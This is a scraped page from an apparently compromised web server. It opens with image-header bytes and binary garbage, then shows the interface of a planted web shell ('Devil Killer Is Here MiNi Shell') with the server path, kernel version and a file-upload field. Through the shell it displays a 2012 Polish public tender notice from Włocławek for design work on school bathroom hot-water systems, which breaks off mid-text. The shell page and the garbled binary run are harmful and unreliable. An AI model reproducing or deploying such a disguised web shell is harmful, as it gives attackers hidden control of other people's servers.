JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120313/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120313/76906-N-2012.html

<p class="kh_header"><b>Włocławek: Program modernizacji łazienek w placówkach oświatowych</b><br>
<b>Numer ogłoszenia: 76906 - 2012; data zamieszczenia: 13.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Włocławek - Urząd Miasta Włocławek , ul. Zielony Rynek 11/13, 87-800 Włocławek, woj. kujawsko-pomorskie, tel. 54 4144000, faks 54 4144257.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wloclawek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Program modernizacji łazienek w placówkach oświatowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje opracowanie opisu przedmiotu zamówienia na roboty budowlane zgodnie z art. 29, art. 30 i 31 ustawy z dnia 29 stycznia 2004 roku prawo zamówień publicznych (t.j. Dz. U. z dnia 25 czerwca 2010 r. Nr 113, poz. 759 ze zm.) dla zadania: Program modernizacji łazienek w placówkach oświatowych - z możliwością składania ofert częściowych na poszczególne zadania.
W ramach zamówienia opracowana zostanie dokumentacja projektowo-kosztorysowa, obejmująca roboty niezbędne do wykonania dla zapewnienia dostawy ciepłej wody użytkowej z węzłów centralnego ogrzewania do łazienek szkolnych oraz niezbędne roboty towarzyszące  -  w 9 obiektach szkolnych. 
Dokumentacja zostanie opracowana odrębnie dla każdego z obiektów w następującym zakresie: - projekt budowlany w niezbędnych branżach - 7 egz.; - projekt wykonawczy w branżach jw. - 5 egz.;- specyfikacje techniczne wykonania i odbioru robót budowlanych - 5 egz.; - kosztorys nakładczy - 2 egz.; - kosztorys inwestorski - 2 egz.; - dostarczenie wszystkich elementów opracowania w wersji elektronicznej na płytach cd/dvd z możliwością otwarcia w ogólnie dostępnym programie (np. w pdf), 
Wykonawca uzyska wszystkie uzgodnienia dokumentacji niezbędne dla zgłoszenia robót  bądź uzyskania pozwolenia na budowę oraz inne uzgodnienia wymagane przepisami prawa. Dokumentacja zostanie opracowana odrębnie dla każdego z obiektów w ramach trzech niezależnych zadań. 
Wytyczne szczegółowe dla wszystkich zadań:   
1. W dokumentacji oraz Specyfikacjach techniczna wykonania i odbioru robót budowlanych przedmiot zamówienia należy określić za pomocą cech technicznych urządzeń i zastosowanych produktów, bez używania określeń odnoszących się do konkretnych produktów.
2. Specyfikacja techniczna wykonania i odbioru robót ma odnosić się wyłącznie do robót i materiałów występujących w projekcie.
3. Zastosowane w opracowaniu materiały i urządzenia muszą posiadać wymagane przepisami świadectwa, certyfikaty, atesty i inne dokumenty poświadczające dopuszczenie do stosowania w obiektach szkolnych.
4. Wykonawca wliczy w cenę oferty pełnienie nadzoru autorskiego podczas wykonywania robót na podstawie opracowanej dokumentacji przy założeniu  pełnieniu nadzoru autorskiego na każde żądanie Zamawiającego lub Wykonawcy robót,  w terminie  dwóch dni od chwili zgłoszenia takiej potrzeby.
5. W kosztach opracowania dokumentacji należy uwzględnić również: koszty inwentaryzacji obiektów w zakresie niezbędnym do realizacji projektu, sprawdzenia rozwiązań projektowych, koszty materiałów i danych potrzebnych do wykonania dokumentacji, badań, uzgodnień niezbędnych dla zgłoszenia robót bądź uzyskania pozwolenia na budowę, koszty dojazdów.
6. Dokumentacja projektowo-kosztorysowa, stanowiąca przedmiot umowy będzie zaopatrzona w wykaz opracowań oraz pisemne oświadczenie Jednostki Projektowania, że jest wykonana zgodnie z umową, obowiązującymi przepisami i normami, jest wzajemnie skoordynowana technicznie, że została wydana w stanie kompletnym z punktu widzenia celu, któremu ma służyć oraz posiada wszelkie niezbędne uzgodnienia.  
UWAGA!!!
Podczas realizacji zamówienia wymagana jest współpraca z Wydziałem Inwestycji i Zamówień Publicznych oraz użytkownikiem każdego obiektu. 
Schematy rozwiązań zostaną przedstawione do akceptacji Zamawiającego.
W wyniku wykonania prac projektowych powinna powstać dokumentacja projektowa z opiniami, uzgodnieniami i sprawdzeniami rozwiązań  projektowych  w zakresie wynikającym z obowiązujących przepisów - w zakresie umożliwiającym realizację robót budowlanych.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykonać w okresie ostatnich trzech lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie minimum 2 usługi polegające na wykonaniu dokumentacji projektowo-kosztorysowej obejmującej swym zakresem wykonanie bądź remont instalacji wodno-kanalizacyjnej o wartości min. 25.000,00 zł brutto każda. Na potwierdzenie powyższego należy załączyć dokument potwierdzający, że usługi zostały wykonane należycie.
UWAGA:
Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków.
Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien dysponować potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia niezbędnymi do realizacji zamówienia w ilości, co najmniej po 1 osobie z uprawnieniami budowlanymi do projektowania w specjalnościach: - konstrukcyjno-budowlanej; - instalacyjnej w zakresie instalacji wodociągowych i kanalizacyjnych; - instalacyjnej w zakresie instalacji i urządzeń elektrycznych i elektroenergetycznych.
UWAGA:
Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków.
Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz oferty, pełnomocnictwo do podpisania oferty, jeżeli nie wynika ono z odrębnych dokumentów np.: z odpisu z rejestru.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość wprowadzania zmian w umowie w stosunku
do treści oferty, które będą mogły być dokonane z powodu zaistnienia okoliczności niemożliwych do przewidzenia w chwili zawarcia umowy lub w przypadku wystąpienia którejkolwiek z następujących sytuacji:
1. udzielenie w trakcie realizacji umowy zamówień dodatkowych i/lub uzupełniających, związanych z realizacją zamówienia podstawowego, mających wpływ na uzgodniony termin zakończenia jej realizacji (powodujących konieczność jego wydłużenia),
2. przedłużenie terminu zakończenia przedmiotu umowy może nastąpić w przypadkach:
a) rozszerzenia zakresu projektu wynikającego z warunków gestorów sieci i decyzji administracyjnych,
b) zwłoki instytucji opiniujących i uzgadniających ponad łączny czas wykonania przypisanych im czynności o czas równy tej zwłoce,
c) wystąpienia okoliczności siły wyższej - jako siłę wyższą należy rozumieć zdarzenia niezależne od żadnej ze Stron, zewnętrzne, niemożliwe do zapobieżenia, które nastąpiło po dniu wejścia w życie umowy, w szczególności: wojny, akty terroryzmu, klęski żywiołowe, strajki oraz akty władzy i administracji publicznej,
d) pisemnego żądania wstrzymania prac skierowanego do Wykonawcy przez Zamawiającego o ile żądanie lub wydanie zakazów nie nastąpiło z przyczyn, za które Wykonawca ponosi odpowiedzialność,
3. zmiany osób wymienionych w umowie po stronie którejkolwiek ze stron.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wloclawek.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Włocławek, Zielony Rynek 11/13, 87-800 Włocławek, budynek B pok. 25A.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.03.2012 godzina 12:00, miejsce: Urząd Miasta Włocławek, Zielony Rynek 11/13, 87-800 Włocławek Biuro Obsługi Mieszkańców - stanowisko d/s obsługi Kancelaryjnej Prezydenta Miasta Włocławek.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie I:
1. Zespół Szkół Elektrycznych, ul. Toruńska 77/83;
2. Zespół Szkół nr 5, ul. Toruńska 77/81;
3. Szkoła Podstawowa nr 18, ul. Hutnicza 5/7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje wykonanie dokumentacji dla wymienionych trzech placówek, osobno dla każdej. 1. Zespół Szkół Elektrycznych - 3 łazienki uczniowskie, 1 na pierwszym piętrze i 2 na drugim. Dokumentacja winna zawierać w szczególności: - inwentaryzację obiektu w zakresie niezbędnym do realizacji projektu, - wykonanie instalacji: ciepłej wody użytkowej, cyrkulacji i wody zmieszanej od mieszaczy do umywalek, - wymianę umywalek i baterii umywalkowych na czasowe, samozamykające  typu antywandal, - wymianę pionów kanalizacyjnych umywalek, oraz instalacji zimnej wody do mieszaczy, - naprawę ścian po instalacjach, położenie glazury na ścianach z umywalkami, - doprowadzenie ciepłej wody do pomieszczenia gospodarczego, sąsiadującego z łazienką  uczniów na parterze, - doprowadzenie ciepłej wody do łazienek personelu sąsiadujących przez ścianę z toaletami uczniowskimi, - wykonanie wszystkich niezbędnych robót wykończeniowych. Opis terenu: Zamówienie obejmuje obiekt Zespołu Szkół Elektrycznych, stanowiący własność Gminy Miasto Włocławek, nr działki 65/16 Karta Mapy 31.
2.  Zespół Szkół Nr 5 - w budynku doprowadzona jest ciepła woda do małych łazienek uczniowskich na I i II piętrze, bez cyrkulacji.  Dokumentacja  winna zawierać w szczególności: - inwentaryzację obiektu w zakresie niezbędnym do realizacji projektu, - montaż mieszaczy, - wykonanie instalacji ciepłej wody użytkowej do dwóch dużych łazienek uczniowskich na I i II piętrze oraz  cyrkulacji i wody zmieszanej od  mieszaczy do umywalek, - wykonanie cyrkulacji do wszystkich urządzeń do których w chwili obecnej jest doprowadzona ciepła woda, - wymianę umywalek i baterii umywalkowych na czasowe, samozamykające typu -antywandal, - wymianę pionów kanalizacyjnych umywalek, oraz instalacji zimnej wody do mieszaczy, - naprawę ścian po instalacjach, położenie glazury na ścianach z umywalkami, - zapewnienie ciepłej wody w umywalce przy sali gimnastycznej, - wykonanie wszystkich niezbędnych robót wykończeniowych.
Opis terenu: Zamówienie obejmuje obiekt Zespołu Szkół Nr 5 stanowiący własność Gminy Miasto Włocławek, nr działki 65/16 Karta Mapy 31.
3. Szkoła Podstawowa nr 18 - w budynku 6 łazienek uczniowskich, po 2 na każdej kondygnacji. Dokumentacja winna zawierać w szczególności: - inwentaryzację obiektu w zakresie niezbędnym do realizacji projektu, - doprowadzenie  ciepłej wody i instalacji cyrkulacji do łazienek uczniowskich, - montaż mieszaczy,
- doprowadzenie ciepłej wody do 3 łazienek personelu sąsiadujących przez ścianę z  toaletami uczniowskimi, - wymianę umywalek i baterii umywalkowych na czasowe, samozamykające typu - antywandal, - wymianę pionów kanalizacyjnych umywalek oraz instalacji zimnej wody do mieszaczy, - naprawę ścian po instalacjach, położenie glazury na ścianach z umywalkami, - zapewnienie ciepłej wody w umywalce przy sali gimnastycznej, - wykonanie wszystkich niezbędnych robót wykończeniowych. Opis terenu: Zamówienie obejmuje obiekt Szkoły Podstawowej nr 18 stanowiący własność Gminy Miasto Włocławek, nr działki 58  Karta Mapy 31, będący w zarządzie SP 18.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie II:
1. Szkoła Podstawowa nr 10, ul. Starodębska 21;
2. Gimnazjum nr 9, ul. Wojska Polskiego 27;
3. Zespół Szkół Ekonomicznych, ul. Bukowa 38/40.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje wykonanie dokumentacji dla wymienionych trzech placówek, osobno dla każdej. 1. Szkoła Podstawowa nr 10 - ogólnie 6 łazienek uczniowskich, po dwie na każdej kondygnacji, w trzech łazienkach jest cw. Dokumentacja winna zawierać w szczególności: - inwentaryzację obiektu w zakresie niezbędnym do realizacji projektu, - doprowadzenie ciepłej wody i instalacji cyrkulacji do łazienek dziewcząt - wyprowadzony jest pion ciepłej  wody, - doprowadzenie ciepłej wody do łazienek personelu sąsiadujących przez ścianę z toaletami uczniowskimi, - montaż mieszaczy, - wymianę umywalek i baterii umywalkowych na czasowe, samozamykające typu - antywandal, - wymianę pionów kanalizacyjnych umywalek oraz instalacji zimnej wody do mieszaczy, - naprawę ścian po instalacjach, położenie glazury na ścianach z umywalkami, - zapewnienie ciepłej wody do dwóch łazienek przy sali gimnastycznej, - wykonanie wszystkich niezbędnych robót wykończeniowych. Opis terenu: Zamówienie obejmuje obiekt Szkoły Podstawowej nr 10 stanowiący własność Gminy Miasto Włocławek, nr działki 124/23 Karta Mapy 52, będący w zarządzie SP 18. 2. Gimnazjum nr 9 - 6 łazienek uczniowskich, po dwie na każdej kondygnacji. Dokumentacja winna zawierać w szczególności:
- inwentaryzację obiektu w zakresie niezbędnym do realizacji projektu, - wyprowadzenie pionów ciepłej wody dla łazienek uczniowskich, wykonanie cyrkulacji, - w miarę możliwości (łazienki po remoncie 7-10  lat temu)  przewidzieć wymianę  pionów kanalizacji i instalacji zimnej wody do umywalek, - montaż mieszaczy, - wymianę umywalek i baterii umywalkowych na czasowe, samozamykające typu - antywandal, - naprawę ścian po instalacjach, położenie glazury na ścianach z umywalkami, - doprowadzenie ciepłej wody do łazienek personelu sąsiadujących z toaletami uczniowskimi, - rozwiązanie problemu gorącej wody w toaletach - w spłuczkach (przewidzieć zawory zwrotne na instalacji zimnej wody w kuchni, źródło gorącej wody - baterie gastronomiczne w kuchni), - wykonanie wszystkich niezbędnych robót wykończeniowych. Opis terenu:
Zamówienie obejmuje obiekt Gimnazjum nr 9 stanowiący własność Gminy Miasto Włocławek, nr działki 19/2  Karta Mapy 45, będący w trwałym zarządzie Gimnazjum nr 9. 3. Zespół Szkół Ekonomicznych - 5 łazienek, po 2 na parterze i I p., jedna na drugim piętrze. Dokumentacja winna zawierać w szczególności: - inwentaryzację obiektu w zakresie niezbędnym do realizacji projektu, - doprowadzenie ciepłej wody i cyrkulacji do łazienek uczniowskich, - montaż mieszaczy, - w łazience dziewcząt na parterze przewidzieć dodatkowy kurek z ciepłą i zimną wodą dla celów gospodarczych (za  mieszaczem), - wymianę umywalek i baterii umywalkowych na czasowe, samozamykające typu - antywandal, - naprawę ścian po instalacjach, położenie glazury na ścianach z umywalkami, - w miarę możliwości (łazienki po remoncie 7-10  lat temu)  przewidzieć wymianę pionów kanalizacji i instalacji zimnej wody do mieszaczy, - doprowadzenie ciepłej wody do łazienek personelu sąsiadujących z toaletami uczniowskimi, pion cw poprowadzić w łazience dziewcząt i zabezpieczyć przed dostępem uczniów, - przewidzieć uzupełnienie izolacji leżaków w piwnicy, - wykonanie wszystkich niezbędnych robót wykończeniowych. Opis terenu: Zamówienie obejmuje obiekt Zespołu Szkół Ekonomicznych stanowiący własność Gminy Miasto Włocławek, nr działki 63/4 Karta Mapy 51, będący w trwałym zarządzie Zespołu Szkół.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie III:
1. Zespół Szkół nr 3, ul. Nowomiejska 21;
2. Zespół Szkół Budowlanych, ul. Nowomiejska 25;
3. Zespół Szkół nr 11, ul. Papieżka 89.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje wykonanie dokumentacji dla wymienionych trzech placówek, osobno dla każdej. 1. Zespół Szkół nr 3 - budynek SP - trzy  łazienki  uczniów,  budynek  szkoły zawodowej - trzy łazienki uczniów. Dokumentacja winna zawierać w szczególności: - inwentaryzację obiektu w zakresie niezbędnym do realizacji projektu, - doprowadzenie ciepłej wody i cyrkulacji do łazienek uczniowskich oraz gabinetu Lekarskiego, - łazienkę na parterze dla potrzeb osób niepełnosprawnych, z prysznicem, - montaż mieszaczy, - wymianę umywalek i baterii umywalkowych na czasowe, samozamykające typu -antywandal, - wymianę pionów kanalizacyjnych umywalek oraz instalacji zimnej wody do mieszaczy, - naprawę ścian po instalacjach, położenie glazury na ścianach z umywalkami, - w segmencie szkoły zawodowej zapewnić ciepłą wodę z podgrzewaczy pojemnościowych, zabezpieczonych przed dostępem dzieci, - doprowadzenie ciepłej wody do łazienek 